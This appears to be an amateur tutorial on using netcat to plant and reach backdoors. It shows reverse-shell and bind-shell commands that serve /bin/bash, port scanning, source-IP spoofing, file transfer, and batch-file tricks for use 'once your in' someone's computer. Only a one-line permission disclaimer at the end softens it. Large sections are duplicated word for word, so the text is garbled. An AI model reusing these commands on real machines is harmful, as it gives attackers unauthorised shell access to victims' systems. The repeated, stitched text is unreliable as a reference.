More Fun With Netcat!!
Now if you haven't read Duct tape's guide to Netcat Backdoors, then read that, then come here. This Instructable goes over the basic netcat commands and how to use them. It also goes over some basic batch commands as well.
Getting Netcat
Now, the first thing I like to have is netcat on my own computer. Don't be afraid to install it. Netcat is not a back door in itself, but can be used to create a back door. Netcat is basically Ms-DOS on steroids, so if you are serious about hacking, you should get netcat.
To get netcat, go to google and search for it, if you are using windows, you should google windows netcat for the .exe
After you have the .exe, take this and place it in your Windows System32 file, so that you can run it from cmd prompt.
After this, you can just type in nc at cmd prompt to use it,
For an example, if you wanted to get into a back door you installed, you would use the command
nc -v <IP_HERE> <PORT HERE>
I will get into more commands in the next step.
To get netcat, go to google and search for it, if you are using windows, you should google windows netcat for the .exe
After you have the .exe, take this and place it in your Windows System32 file, so that you can run it from cmd prompt.
After this, you can just type in nc at cmd prompt to use it,
For an example, if you wanted to get into a back door you installed, you would use the command
nc -v <IP_HERE> <PORT HERE>
I will get into more commands in the next step.
Basic Netcat Commands
-e prog inbound program to exec (dangerous!!)
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host <port>
Connect to multiple
ports on a remote host
nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p <port>
Connect to remote host
and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Port scan a remote
host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -Âi <seconds> -v -z remote_host
<port>-<port>
Pipe command output
to a netcat request
<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.somecompanyasanexample.com 80
Use source-routing to
connect to a port on a
remote host
nc -Âg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -ÂG flag to specify the source-routing pointer.
Spoof source IP
address
Use the -Âs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -Âs flag can be used along with most of
the commands presented in this table.
Transfer a file
On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -Âv <client_host> <port> < file
These can all be used by your netcat
-g gateway source-routing hop point(s), up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose (use twice to be more verbose)
-w secs timeout for connects and final net reads
-z zero-I/O mode (used for scanning)
port numbers can be individual or ranges: m-n (inclusive)
Connect to a port on
a remote host
nc remote_host <port>
Connect to multiple
ports on a remote host
nc remote_host <port>...<port>
For example:
nc www.somecompanyasanexample.com 21 25 80
Listen on a port for
incoming connections
(Also know as A Back Door)
nc -v -l -p <port>
Connect to remote host
and serve a bash shell
nc remote_ip <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Listen on a port and
serve a bash shell
upon connect
nc -v -l -p <port> -e /bin/bash
Note that Netcat does not support the -e flag by default. To
make Netcat support the -e flag, it must be re-compiled with
the DGAPING_SECURITY_HOLE option
Port scan a remote
host
nc -v -z remote_host <port>-<port>
Use the -i flag to set a delay interval:
nc -Âi <seconds> -v -z remote_host
<port>-<port>
Pipe command output
to a netcat request
<command> | nc remote_host <port>
For example:
echo "GET / HTTP/1.0
(enter)
(enter)
"| nc www.somecompanyasanexample.com 80
Use source-routing to
connect to a port on a
remote host
nc -Âg <gateway> remote_host <port>
Note: Up to eight hop points may be specified using the -g flag.
Use the -ÂG flag to specify the source-routing pointer.
Spoof source IP
address
Use the -Âs flag to spoof the source IP address:
nc -s spoofed_ip remote_host port
This command will cause the remote host to respond back to the
spoofed IP address. The -Âs flag can be used along with most of
the commands presented in this table.
Transfer a file
On the server host:
nc -v -l -p <port> < <file>
On the client host:
nc -v <server_host> <port> > <file>
It is also possible for the client host to listen on a port in order to
receive a file. To do this, run the following command on the client
host:
nc -v -l -p <port> > file
And run the following command on the server host:
nc -Âv <client_host> <port> < file
These can all be used by your netcat
The Bat File Portion
Once your in a Computer or server, you can exploit anything you want, usually i use vbs and .bat files, but I also want to create files through this method, now, you can transfer files by using the commands previously stated, but I like to create the files on the fly. You can google ways to transfer files through MS-DOS, and get many methods. I always like to use the Echo method
once your in, use this command
Echo put file contents here > name.any file type
this will create the file specified in the current directory
Once your in you can run these by the simple command line
start filename
once your in, use this command
Echo put file contents here > name.any file type
this will create the file specified in the current directory
Once your in you can run these by the simple command line
start filename
Netcat
There are many other things you can do with netcat, but I have not gone into them in this guide.
Please do not use Back Doors on computers you don't won, or where you have no permission.
Please do not use Back Doors on computers you don't won, or where you have no permission.